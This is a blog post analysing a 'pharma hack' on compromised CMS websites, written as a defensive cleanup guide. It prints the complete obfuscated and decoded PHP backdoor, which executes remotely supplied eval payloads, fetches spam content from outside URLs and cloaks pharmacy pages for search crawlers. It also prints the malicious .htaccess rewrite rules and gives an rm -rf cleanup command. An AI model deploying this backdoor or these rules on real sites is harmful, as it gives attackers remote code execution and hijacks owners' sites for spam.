Pharma hack got caught!

Posted on Posted in Malware

Recently we received a number of requests to cleanup the websites with the strange compromise. The websites contained a number of pages selling Viagra, Levitra and other pharmacy stuff.

It is important to note that most of the websites were not related to the pharmaceutical business.

This attack is very interesting because it is not visible to the normal user and the spam (generally about Viagra, Nexium, Cialis, etc) only shows up if the user agent is from Google’s crawler (googlebot).

The google search results for site:domainname.com looked like the following:
Cheap viagra, viagra for cheap prices, pharma hack

Analytics:
The source code of the selling page looked like the page was loaded from either genericpillspharmacy.com or securegenericmeds.com domain, so first of all we updated the .htaccess file to replace these URLs with the name of the website domain using mod_substitite instructions:

Header set Accept-Ranges "none"
AddOutputFilterByType SUBSTITUTE text/html
Substitute 's|<base href="https://genericpillspharmacy.com/" />|<meta http-equiv="refresh" content="0; url=http://domainname.com/" />|in'
Substitute 's|<base href="https://securegenericmeds.com/" />|<meta http-equiv="refresh" content="0; url=http://domainname.com/" />|in'

In this case visitors would have been redirected to the origin domain but this didn't fix the search results, so we continued digging.

Files: We found 2 files named common.php in multiple folders with the following content inside:

<?php /*cdt mgR<i+F=kugcQzDcxbso0syBSrevXAl07,3 4qkmtaPxG bydN=EONvt9:uw6Eco;Iezy.PUse:yTWk=1zHz;-uqpdus:r1zUcrjx0nsk7okfCfjcn9ygg.wjmrUHAwyj;kApv7GJpJpzl3kMM=E9dqcLXxTX<sh=Ghj2qq 7iOJWbVQgGuwj7<8CU5u2y1lLf3bumEyXT8tv*/  
$zNTfCawezFEPPpWLORvISIq='6RH65572,SM.TOC'^'U -WAPhTY=.Z= -'; $uGZSiOjhcDNedKJcPNsfCPqRglazu='J7-TPP1L3'^'-MD:6<P8V'; $toXTGGiqoKtBpWLyzbMrGPG='PXO7CC:O2U<1T'^'29<Ruwe+W6SU1'; $bYIaQKkHvZuktANiclPeYbp = $zNTfCawezFEPPpWLORvISIq('',$uGZSiOjhcDNedKJcPNsfCPqRglazu($toXTGGiqoKtBpWLyzbMrGPG('O6Bv IGsLM2Z8U i<Iw >;WASc NW:+A2KQs,w4fD9F.P7J4,1Xw=r.Z:cCH8CYQ758eCbaMKQELSvC;wPBZGeSFq+W;,;XWQ8Up8<V:9d;Q.X o-MJ6eB>vB4f9k=CzAL8>XxCoEz1tomLT-zB8I4D5Z l 5WCp,Ol1.=2.5IP862+n;j2K=Q9 ZCie>cG9X:h..= 4PTCT,<6G6Z.c7kL=<h9bZ4;X219=Ea-oYBR.MaCOt1Rs+aY-sX5<;Sx>bqZ,O :jEWvE;-CeS-=Iaf9XD04;DPZV>+7+7rvY:8 -X+M1;q<EVWXA P,RVGRNp.HUf.7+<zz1ghWN7JAnXCyZyOGxLB5C:dpBwK7<>6-w< 9,-,74S6w;+>vR2x50UiqroZ.6=14x.ZY=533NGk,63Ju9C5H2:;w.LD,U:ZRYWDSa6CXXr30-GVM=W;3jlkP+;8Fw.; VT+PGP+;G.;EQ-0FA8uZp=Y9+hnAi0dLh,6PR9,Je>uR6kuU J>0=,ClXR8q y:PHt<HF.5d6=i1S,.<Or1+7n2BV2>4N028,Ls KeDK88r.KN2=8TBsCfB77,8.u=N>Y45M,YyX;FB1x:o97,Nq62:pz,1Qe6X2j-1Y2VuBEGrul:QUK;, 2CGa >:-VvK I+S.XZz4<zE6<5iLPo2h1.Y>G3-ewiIbTZB 6jw=a3s3XTT0A0GcI:=naz4,U<ea44Czq81iG9QE:38.BqFpP,N4H4A3ZcocU>qK 62X74yFxI<.>>hS3;+-8W56<X=85UORYVwn-U,05s,yV<7au<QFglD;xC9<yZ2Gz9 Z3:8,;Q+.S;56Vt31-6uH-k.;IVMx,D:nW16x1E- d01RUy4-nIhZ279zGBe<;5.wjsj-F O9WXLoOI--> O.UCh9=:dV wBYQ3mU7B 8,iKe8RXIXkXEeSOK 4726VZXv82X8U5,9+q;8373198G<nG-X;1VpSLWm,5-L+-Y-973K2.64YRse4=ml<IHA=2BxvYsn0Bs1:46s5B0Rx;GZZ9j0>LD>IC8>p<: >iV:=56N26LvU6Z1.7=R>y7m>9:18LE.<hcM2D;:sKH6-3u U1o5C=21YZ3q1A3Y.ZrwXtz>Y:;3R0=V>B+-DPr+<iAXrP>D:<f<W4-NUJBH12UUGkH6gh nPa<3,nll3QUQW.wkEu45lQR1Sd;Q+6U0+ luCIa<v7u:U1D3P;AM+6Zz --3krG>w9rvq0XwHi=I.Vz-6D86yw;<v4,3w79s5t8BO-M+q;2dzAeYOFR, -q81Cf2r3KLjc6<F=+W+tMU  -1,=t5DRQ,Ac29:AN8o,6FmWIqGc<+TV>UX56j9:iwRS>T4K,7h8eflyWM Fo==0+E>D.YOPD8xM=:- ;,0H=;;>z3Zm+ 30=;QY1ebhwCYB1ePSR7=7P<38:=AGQh6EE,>u4=Q2Bwy147BLs5,25Q3Uj>Q3;4PzMu0>5.WN,cz6s3KL75LO<;0 .IwYC-..GGRl,sXzqM6Z,.9W64Hc57U23:fG4Cr wX9UV=,+F=6s.6XZ,Z>M6>d<=<sO5A8G=k:7B<K7HA7>VNdq5Wrx+GMvvY.yX->>H65652bGCY kh95;g::6  eLr29J1u:=p=:=D,BM0K0dtZTq3:e+DQb99ROlC>8fZBv0>=hp+El-:RkP MpL.XibWt6wDaM.e1+SURM1-9UC70Iw2R:yf AVS2p9XM P<>5A+90Me6DR14:r1fA5GBeJl Mt;fhr2Y1FB=9O<;W0dAMhQq=27a65S,0QTw75+0=Vu;uMj3R+0+TAKO CIrTR18qW8>4-3V-I3IDI,P>v+s=a UT6P:q;f<6 ,d1nM3R6SYOxYBOq.YZCMFS::35iY4nzE0IRH=5Zt9-.Tu,,;Az7<Fa=Q<,.:5,39OnTpcTz<UsUmOOHvsktEDDa7f,z+4Wux4j<sZnT>zz2TIV=7iXDRw3YCRt+A,->MQu=6,<6TBHC9U=652Mod:QW4sVk64+6N+v2dXaOW7iKYdw:=I8S=NK.1T9QGZ4W5<6.89IR y22J<.C;,.E290n6qtbK9F:0p<u;rxvz601:UG;,veR363-I0<w7Z9pf:2F33GWVUU763Mc;u.M:0QW>WU1:>2FP:<R8MGgEUP:Vm>7-p>1dZDOZ1;5aY-:6EVGM;1,57K+0MO;15lyB7iS-OK>-L9< 5t,Yf=SqI;C9-+YHPu>3M015pz50Fvo2:,4NT3>;++xTB5 Wp=9eKOqzIE44CKUASW8fFi>A>ZL3F9=R=TgcP4tG+43g:i-GtRFlRBQM4IAQ8=>2T=379 t2HdJA= Im=4zWE3dr9JuNyFtTj9d;ReA> 5QFXE4YSdXT+CV5MF:BG=zgIrJ.6C2G=1-R;y5D1PjtO+ZYHS4aPHG2<GETC5:6Y2I1+eQQ7=CU9 >9 ,=w6Q71yX0HxH2b:<97XLKN4HBqO<B1EC4SH csC ,O:o+khOG:B9V=FZ+S=8Y=R.atsuC,OZ6Ei>G4Q+,Q2+xoF+.A3yEAqyydL3nWFuF0BUq=Wu=v-V.M>hD34:sETVY,98xp:t+47M,;E.f2P+C9-7nb-rWG,8SR23-MF2=.A+,NXX5RJhV7BcLAOdYra0MeaGWGJDIAYQ5K==P4TH,xAU-MVohXA17F-,vIVEI,.xa9qTxBT3LL28S349G 0fULism+5b0=05Zs6D9OOh;; qPPEN4HY4zSSCn3.:R3Vr11BW0.LhQ=h4<7j6uW<Ks1.=DZME1>8XHcJ9FA;0TB+1 <TG4U::1O3e642n8H7OH1E<gIG,63C X<.OPK=490R,ZsbvWL+V.fm==g+0IfZT8JB1N+=9B=DP7MZN9;<+D9TjR;k:thQ,9,.sSXP1+D+w3<M-cxx-srJhFx3RMqD24Jfr,L3MvCf,J;29ikK1P<0i5Cwu8ji26,5Z<>C77;R;->=39yV>A:L4U Pq1RDu=gUT7dSo=on7AkAWDbXPF;24sbZU<Rt5XDX-Uor1=L:5:>8gC7zGhofSXW7Y0y ,,Yy9;<z<8DLY9073Tw ;;j+qj2Ji>BLHK=Vx3U>LRS1b,,-X o+,f1>n3z8W2sc2:M-fNT3rr+=o=;=5U5t4Z>8,P>uGU<<Y-165SWOD7ur;.;Eo7wRXz.=mMX=j;pXEp>crSk9N Z>= G9<><Qiy5<:7+kjQ3E,Vonr=u3-=1Fi0H+OGQVZ56<AU37Pf7YC1MSY8y,-tD2z>C=-zlfP4qnwD>CV5v;eZ2Jh3G6w0G706fhAhsIJL1099635<<6447.4MQ=M,V;h2K25-=w. 0c>1VW,NlU,QL-><5.o<CZ<jox+:31Yl..YoMA+f; u>>mpU6 9.-f2y3,m,+u>5h2>;EP<4xYgX;sIUipU5QUg<lC ;=267hxLrBFFV<4e;CVe06X18eZ3F ,>QNx ;-m9:WL.puw6>Jj10j0T+=JmCT785V,uO:A<+9 te.J>PwVmYPemT0n.M63<-98828;mZ:8XZ:AJ0uS Rp>.hjErh1jh3D6X1uub>P<A:FpWXY4=g;usHk,vNtQQs+.U5yQ;CSD,->9ZN0O:FZ=<sp-z: :GqSF>M9EL9Z=<:4W3Bg:>+Uw=E<.4lP6II4X;XZ8CB:R5w=o6=v-Cx38K0i,ZA3TEk0rf-4sF;gW;x-6GT.3e+IV6A-2JsPPW9+r  >e9Y;=O3L7U4W3z3WEbc4E ;u0L 6=8>B0SPB U1444S44-6.amU9x...D>JxU61KZ 5<UcCxKvX<=<ZFnys:w+ +bF3+QHGf6mH C;,1QQA738D8S7,512rqN0RsAWzXUQ7XR.NF:D5MUlW>KT9Z2<B,,.Y+E13D5ra3+JdN6D-rZ.,<Ua60sL.SwE5eHHf9XJ5S Ir>9-29 Ssk+47c7CiFnp12a9H20Kt.o-> =s3o8UTj>nJV08t.7+e:wOP9S;6,:1myyW>t5PFH0O16mwv2D1XC<7Y:-s9i2XcSs=; d14eBK,+WOKV;0q7E0,XJW1VBSB2<-B<g>0K 4u=5 2Qv: K3E+<<;.2326Ps<2;, igES4SVKMkkROl8HYela2po'^'=d,Aup58g Tbsdk.Y>=tRb2pjTsw9TX0U >5b=v70cqc;F=eUP,=x9flLZz>ps2cvbOR WP= z=gdY NF>qo-<=0=y2YvY63fh07JXckOUogz:L<f+0o. z8mzPL=vzBs8SNw1q+2;GD.=81h<,M9r=qoy Lb929Cx BwpQbY; Lydr+t:x.e0cOcp9=W =i4h2Kcppveg,:gTx2yny S=uzm1z5qSL.VWAV-7k651yi:Q7vFs=>L41g;odiI2-IZ 5j-eCS6:; WB0 <kz;NIM+5tWM> .0WCbBs77ammcH.gzBY6j=f:s0x1g4f2k Bk zImqqS-OP6<;+Brp,kr,+I q-g8z.HR>z 8zSxsnCDdhxecYY>f6mQh;=U-eaf F;=3IRngg,c.2MLrGa=XexVxBP0q9EruXi <M t0bj -d8P;k7;RInvc,r0ZFA<1irYQ.6ijW gZ=.=ynqap7 JvppV01=T2Nc ,t.q==PCq fSYaPY77e=Lfb:QgLF;6=:q2d3P: -z>,ot1an.tguvi.=iIa<Gw=vTu6swwkcGb<.- qV cy-DJv71JzTryZgrc;z h>lvbm 31l5rk=U9hNg6 PcS HXc=RP0t3hc+P;65=67>-Ub;,PKvu7u5mYMob3 Z>B6J26CwmCwckR09 =T Ab6V fJQ4< 4<uzyfR2oRf2a1- fnF2Qfvk8+5ve2q72rVs20Pw 6p8=htiT 2i51t7mga;F22D18d5,vFU2ar><6=mWfQ=epufgK>Tae9xqz 6g7 4+T>Izc A,8dUX=X>.RU+r9wkn20fpKNG2XUuMxgFc9zMx,8aPaTZ>h3Dwq=t4G+M6<CrAV,xF1Gx90RayY1-+wvq0w:,oTEh<<A;dws<R.6c=xqilok6t:r:zuU2aC3i=;J,dV-qlvPy3y91<o>5t=2=3NyXwg jk0pu=q<ttRh JBZdytMk6n 0J2py;H1<6UcWj+gevDTav>eHtPr+ 3FmU-p1=vyy6; -EEj EXmdB;p6Ed4m+ijSAeu><ufvrW qqgi=9popu=xpy;=z ykxWdn5t7Rixra<tYv:;5pokp>19dcZCyar:E3Mcd:7y2v1P:eo -w1<n4JxV:wG4i:hbo:AaiPv57 QtxE edVA:6er:isc<19cZ5>E= PtXUW >kb,9 c2 3=Ds9iyZaKr=hTfTQp5 :. sDs,Lei2w bybxE0IBNYr991OGAD3HrmC0PP+ko7LX+Vx14lI=wzu=yu;VLKpvHtQ9xKQ9+ axr;fuwZqd  B5w z2ZwrmtD0x-  dfUByR=Ou;+bn6Vmcp+s Og55n.50Qfl<:Z:;Qg2NnQ242n2p.fdPp.3UK0<o -wRvB L>x-<7vR;fZuIxqtQ9OpiXCJ+ fduuRW67zS 2=w<.T.79>xls4yewCmpq8XLt6ttAdY3auN5WYas 1cIYe=PgEo3ZVw6=92iRblg=j3Hw2By4Yg =uuaNo<>;1XWL 01 K= -98QluwP9yY .ma9Zbq0-rv s9ja=yNIi4zl vbiqe3D=td7eNnD>q4kpt;la Qrv=-vw59W8f< 0e <:Ojh3ajpIgyaoas: .=d .Zwl4UxfPU3g8Zp9IANu9lWh-U fH=c3F=8+wySs6fMrr>yG.io,,v8qVIY n, lLf3=a:1:xhY;5 w4 W.JQuD9 g4Ddq9+Bf AV7p<.Bu cUAK=4xehyL6Bqe .tojsNp<uU0y 4.8UFb;b11GC0G tXN5sL<wV5. <<lDMJXbfEe971yEsewa3A05 E9EQN0j8;B 9A ezv =WjGlp=a9b =qjhF8F2J4md0T=o2L-sejt<p= F7Pf:=052-6Ko>u=1=Ttuf 3m, =z;  Pr<<tlK- eeW-.Xup4n suisqnpW6;=F0;;rlAc5-w.5 2Dsk3+g<d5nz;-6f3OK- dLJ.q:  mu=ju 9y.sj0lrMbn7d2qYAfrc0qrM=zdBx 8 J:en1> spnS9j9BK>Pw=Z0 kO0tn Qczw:OY9cc >leYMFTLh<gn;fP>TKtmIMtPOt d>6ZxXiiF8x<A 639GSfS -KX.2 FBIc;xKFE,n2WuXrVBt5;4lSAqf5ZDwbtBhePgevVYhi2clcv 1=.gfUy LZgCYTSktw3Usv ;xNd0 p9KegSV:IB>>bDqT,2m19yw:yY>RdjB2z QS0><brOIr8+e=Lf;vzVCJEi   cytY8-gQklf<3ssX2>oXJ;v81bnAQ+;=p53J>,-L hc9p.oi6u 56fy 3DngQu=Xu <.4cig+Z8jfzMvkekqATw,V   5to- rVJb7gKCk>C,.q-6=T YeS+KGDb1k+s0;+=ecz7q7uR;vZU 84=YR1jlWPGcW<wqRa>A,sm4,baSgxlKXu.g7cvE:b+bc=z SZv nhGRNNl RhUc;.V,I8xPLDKU9-z<f=u7>s3Ynpx;cS A7FI6P8A9,y5N.Kyz.+sfkU0maMWDD8lY >Zr1h-PhSvaAX  mfF3G<wrCH= =E;1vD j:cArn;G9IaC LYsaBX8t 11MqbWCh=yDF+ZksA A2EvQKOEUU3-5Vwa0PaY.,hYlvddxn+agr ,ez56s+440VU QQhe>- =4r X=KOaQ9.V 23o 278= uOwAC5;1vzNTM,H=52;;d uBZ<JRppKc.b8 87hzRBpabc5l2r.=GrzlEg> yd-vZ65<w4imk0Gb uPrxhG=.6Z9wqs:B2xs  tdP=bz2GIL4,L=X psv8rzcgP06UfxYx<X,Bxb4p8a=8I6L +,Obx7iirI,cyxEJa<n39-9:6metT8Pm1qWx5<ah3;t-aujqt6;ny07XSwh0C9-:n;x-9ghxyB:95hFS1Y yd>n9-+zFK=1.Ob9 6+yU.3Df JyF-Sb=RjL. =f RB,Q76Es=:wbiYcPnqvCZdHyvxpu<ft8Y-Aedb4Z3w1m6 8d-69r <U1Yub WobrRjc:2<7S9:Mmv3DcVCUx-navZS.9a<=+5,5ncm,b=LmOi6SvpBWz7  hHuv,=EPU-Q8+br Di.0;x>Oxbn 7=TPBKBom9Jf4Kd-y6KoJ4 PY.i5 ak6Bns,ZquD;AFF9dhm4tZq4mhiGZFb5  um< OHrr+Z.8k.weXulP9h2 7<H-0f>wym4RYctcysY5;4pWrgC-==Q1zfWA<wDeNvym.V8Jv1g5.lpOt2FP4MY-sr8c5j Of22y.I-uN; 0>W=A8up,nf7nThPr<ary=s=NvQ> n8> suHDiioZVUKzggqcp dZ+z<kQt3ymaTFbvj3nfo>uz.bd=:XVxBfVV9-MR7-xvUw7 Cb=W 5z+Je=pp98 EEpmdPy3Jj DfCwo.QZx 1qx9nU7c9,f 6>g40PP57umghWo0O;G mm3nq Zq.1fTlvO5ud lfLbz+toE:jS>gl97OOU,.kq=feBdy8+ tqV=nM-q-pmsl=Wh oiC3, ;+81w L tkYIhrsVZO+.qH6-orea92B1;ya0,sK.T  C e;V 27merskv ;;=yqQrG 0RJ>aB h9gIzg=dW+g0JuwNcxUdn4cYP9Fx=lEJ=>x0k:ks-aklSbW=K14ikRd>z oer-3d <V0in6j2rTkyGj-Gu5c.=fP.f>XmxPgq1t=MjAA,TV.qNdX1-ax4yyynrLw D:=xqI IqtUqhXYyU m,B RCt>-1:w da<jxByspGrq5dtq<fCqU5uWzDO+53KNGoboi8.>ET31Usfa1:=dG-eLyli686t6fMg;wZez,,-n;:F-qvAgb7xvT6B=VipDv;= Rk+.eMo=7V+ygvmO=X9d ai.aM8bi-ZMViJ0re<Y;8FR>7ztvg+,OMxl+pDX G+B Q.pc-nhayaSb9iRhziIbB hnb7R +3- IDVh9KJ,-v aqkmXb-bm3 L78:Gl7aoNNk dbvblBVjc<0L6V Ci4+u.xo N7ctp:.so4WD:V bh, +Orj1DL.w UN.,  qd P.Fi<a=V=zxtbWH,O iT LVGxpGc3>Jx jrzdWMivaaci6JEjnh33,cabd2x<9d;<w1aRC sMR'))); $bYIaQKkHvZuktANiclPeYbp();//=gdJ4soNGnYc2try<z=QtA.VjjFuMy4
?>

This is the encoded body of the malware, however it can be different in your particular case or the file name can be different.

Here is the decoded body of the malware file (Thanks to unphp.net):

<?php if (!defined('FCONTENT_PROC')) {
    define('FCONTENT_PROC', 1);
    @error_reporting(0);
    ini_set('memory_limit', '-1');
    function workerA1Jt() {
        if (array_key_exists('HTTP_TEST', $_SERVER)) {
            echo (md5("TEST2017HT_CLICK"));
            exit();
        }
        if (array_key_exists('DOCUMENT_ROOT', $_SERVER) && is_dir($_SERVER['DOCUMENT_ROOT'])) chdir($_SERVER['DOCUMENT_ROOT']);
        function get_db_dirA1Jt() {
            $default_dirs = array('wp-includes/SimplePie/Content', 'wp-includes/js/tinymce/plugins', 'wp-content/plugins/akismet/_inc/img', 'administrator/components/com_media/views/images', 'libraries/cms/html/language', 'media/editors/tinymce/js/plugins', 'tmp', 'wp-content/uploads');
            foreach ($default_dirs as $d) if (is_dir($d) && is_writable($d)) return ($d);
            $current_dir = opendir('.');
            while ($dir = readdir($current_dir)) if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir);
            closedir($current_dir);
            if (is_writable('.')) return ('.');
            $tmp_dir = sys_get_temp_dir();
            if (is_dir($tmp_dir) && is_writable($tmp_dir)) return $tmp_dir;
            return false;
        }
        $short_host = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']);
        $temp_dir = get_db_dirA1Jt();
        if ($temp_dir === false) return (false);
        $idx_file = "$temp_dir/sess_" . substr(md5($short_host . 'idx'), 0, 26);
        $db_file = "$temp_dir/sess_" . substr(md5($short_host . 'db'), 0, 26);
        function xor_dataA1Jt($data, $key) {
            $out = '';
            for ($i = 0;$i < strlen($data);$i++) $out.= ($data[$i] ^ $key[$i % strlen($key) ]);
            return ($out);
        }
        function fetch_urlA1Jt($url, $data) {
            $content = '';
            if (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
                if (!is_null($data)) {
                    $opts = array('http' => array('method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data)));
                    $context = stream_context_create($opts);
                    $content = file_get_contents($url, false, $context);
                } else $content = file_get_contents($url);
            } elseif (function_exists('curl_init')) {
                $c = curl_init();
                curl_setopt($c, CURLOPT_URL, $url);
                curl_setopt($c, CURLOPT_POST, true);
                if (!is_null($data)) curl_setopt($c, CURLOPT_POSTFIELDS, http_build_query($data));
                curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
                $out = curl_exec($c);
                curl_close($c);
                $content = $out;
            }
            return ($content);
        }
        function update_dbA1Jt($data, $idx_file, $db_file) {
            if (!array_key_exists('method', $data)) return (false);
            if ($data['method'] == 'post') {
                $response = $data['db'];
            } elseif ($data['method'] == 'url') {
                $response = fetch_urlA1Jt($data['url'], array('host' => $_SERVER['HTTP_HOST'], 'file' => __FILE__, 'method' => 'include_remote', 'force' => 1, 'line' => __LINE__));
                print ("Got " . strlen($response) . " bytes response from url=" . $data['url'] . "
");
                $response = @unserialize(base64_decode($response));
            }
            if ($response !== false) {
                $response['idx']['last_db_updated'] = time();
                $response['idx']['update_method'] = $data['method'];
                $bytes_idx = file_put_contents($idx_file, xor_dataA1Jt(serialize($response['idx']), $idx_file));
                $bytes_content = file_put_contents($db_file, $response['db']);
                print "Written to $idx_file $bytes_idx bytes, to $db_file $bytes_content bytes
";
            } else {
                print "Response decode error
";
            }
        }
        if (function_exists('openssl_get_publickey') && function_exists('openssl_public_decrypt')) {
            $pubkey = openssl_get_publickey(base64_decode('LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBdXMxWjJ2emkvOHRkNkVWOWdMRlMNCkYxWng3alorclF4Z2hhVGUyNUw3bzRyL2ptMlVtR3QrYnJ5MmliMTJCbWFLRmNWVy9UanF4ZEg4VURNSGdwL2wNCmNrOU85VVBPMVBJelRFSjE1dW0zaDdJazdvWGlDNitOOGIzM3g0QTU2dHMwdTJaRHV5ZG0xOWM0U1l2V2hCOU4NCmRqcmtwVmFvU3J6dWFrbzNrTmVOZUVNRSs3Q09YQnJzZFJCNGlCVGVPWjFTK1J3ZEptRDFRaHNVS1NXWVIzblUNCit4bUdma1B2YjliVFBpa0tkaU4yN29CUXRCWnA0MkdOa0I1VzZORngyemIzc2FDVkx2c1NvaXlpeE91NkdmMGENClZlVFdWM05HOW5aTVpCY3M0bDdXbnBjaHpJdFlaYWRSNjBxZi9qS2pnUGhjelhIcC82aFFlQ1V6YzdpQTJKWDYNCjJRSURBUUFCDQotLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0='));
            $data = false;
            $data_key = false;
            foreach ($_COOKIE as $key => $value) {
                $data_key = $key;
                $data = $value;
            }
            if (!$data) {
                foreach ($_REQUEST as $key => $value) {
                    $data_key = $key;
                    $data = $value;
                }
            }
            $data = @unserialize(xor_dataA1Jt(base64_decode($data), $data_key));
            if ($data && array_key_exists('key', $data) && array_key_exists('payload', $data)) {
                if (openssl_public_decrypt($data['key'], $xor_key, $pubkey) === false) return (false);
                if (strpos($xor_key, md5($_SERVER['HTTP_HOST'])) === false) return (false);
                $payload = @unserialize(xor_dataA1Jt($data['payload'], $xor_key));
                if ($payload === false) return (false);
                if (array_key_exists('eval', $payload)) {
                    eval($payload['eval']);
                } elseif (array_key_exists('info', $payload)) {
                    $idx = @unserialize(xor_dataA1Jt(file_get_contents($idx_file), $idx_file));
                    if (!$idx) $idx = false;
                    echo (base64_encode(serialize(array('idx' => $idx, 'server' => $_SERVER, 'file' => __FILE__, 'line' => __LINE__, 'idx_file' => $idx_file, 'db_file' => $db_file, 'db_file_size' => is_file($db_file) ? filesize($db_file) : 0))));
                } elseif (array_key_exists('update', $payload)) {
                    update_dbA1Jt($payload['update'], $idx_file, $db_file);
                }
                exit(0);
            }
        }
        if (is_file($idx_file) && is_file($db_file)) {
            if (!array_key_exists('HTTP_USER_AGENT', $_SERVER)) $_SERVER['HTTP_USER_AGENT'] = '';
            if (!array_key_exists('HTTP_REFERER', $_SERVER)) $_SERVER['HTTP_REFERER'] = '';
            $idx = @unserialize(xor_dataA1Jt(file_get_contents($idx_file), $idx_file));
            if ($idx !== false) {
                if (array_key_exists($_SERVER["REQUEST_URI"], $idx['bot_urls'])) {
                    $is_bot = false;
                    if (preg_match("/Googlebot|bingbot|Slurp/", $_SERVER["HTTP_USER_AGENT"])) $is_bot = true;
                    if (array_key_exists('bot_masks', $idx)) foreach ($idx['bot_masks'] as $mask) if (preg_match("/$mask/i", $_SERVER['REMOTE_ADDR'])) {
                        $is_bot = true;
                        break;
                    }
                    if ($is_bot) {
                        $content_db = @unserialize(gzinflate(file_get_contents($db_file)));
                        if (($content_db !== false) && array_key_exists($_SERVER["REQUEST_URI"], $content_db)) {
                            if (array_key_exists('headers', $content_db[$_SERVER["REQUEST_URI"]])) foreach ($content_db[$_SERVER["REQUEST_URI"]]['headers'] as $h => $code) header($h, true, $code);
                            if (array_key_exists('content', $content_db[$_SERVER["REQUEST_URI"]])) {
                                $sapi_type = php_sapi_name();
                                if (substr($sapi_type, 0, 3) == 'cgi') header("Status: 200 OK");
                                else header("HTTP/1.1 200 OK");
                                echo ($content_db[$_SERVER["REQUEST_URI"]]['content']);
                                exit();
                            }
                        }
                    }
                }
                if ((array_key_exists($_SERVER["REQUEST_URI"], $idx['traf_urls']) || preg_match('/viagra|cialis|levitra|tadalafil|sildenafil|vardenafil/i', $_SERVER["REQUEST_URI"])) && isset($_SERVER["HTTP_REFERER"]) && preg_match('/live|msn|bing|yahoo|google|twitter|\/t\.co\/|aol/', $_SERVER["HTTP_REFERER"])) {
                    if (array_key_exists('headers', $idx['landing'])) foreach ($idx['landing']['headers'] as $h => $code) header($h, true, $code);
                    if (array_key_exists('content', $idx['landing'])) {
                        $sapi_type = php_sapi_name();
                        if (substr($sapi_type, 0, 3) == 'cgi') header("Status: 200 OK");
                        else header("HTTP/1.1 200 OK");
                        echo ($idx['landing']['content']);
                        exit();
                    }
                }
            }
        }
    }
    workerA1Jt();
    $originalurl = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
    $originaluseragent = $_SERVER["HTTP_USER_AGENT"];
    $originalpage = fetch_urlA1Jt($originalurl, null);
    header('Cache-Control: no-cache, no-store, must-revalidate');
    header('Pragma: no-cache');
    print $originalpage;
}

The following encoders were used:

  • base64_decode
  • gzinflate

The files is checking whether the following folders are writable:

  • wp-includes/SimplePie/Content
  • wp-includes/js/tinymce/plugins
  • wp-content/plugins/akismet/_inc/img
  • administrator/components/com_media/views/images
  • libraries/cms/html/language
  • media/editors/tinymce/js/plugins
  • tmp
  • wp-content/uploads

Next it defines the first writable folder as tempdir and creates 2 files in it:

  1. $idx_file = "$temp_dir/sess_" . substr(md5($short_host . 'idx'), 0, 26);
  2. $db_file = "$temp_dir/sess_" . substr(md5($short_host . 'db'), 0, 26);

You can find them by running:

find . -type f -name "sess_*"

These are binary files so can't read them using text editor.

Next the files are being filled up with the particular content using POST http method. It looks like the website is now included into some crawler rotation because the file will get updated from time to time to display ads of the customers who pay.

Recommended action:
Backup the website files and database before doing anything.

It would be obvious to remove the infected files from your server. Also remove the following block of rewrite rules from your .htaccess file:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond %{DOCUMENT_ROOT}//common.php -f
RewriteRule ^.*$    //common.php [L]

Also it is recommended to look for other includes of the following text in your .htaccess file:

%{HTTP_USER_AGENT} (google|yahoo|bing)

Next remove them and corresponding files.

Also remove the idx and db files:

find . -type f -name "sess_*" -exec rm -rf {} \;

Leave a Reply

Your email address will not be published. Required fields are marked *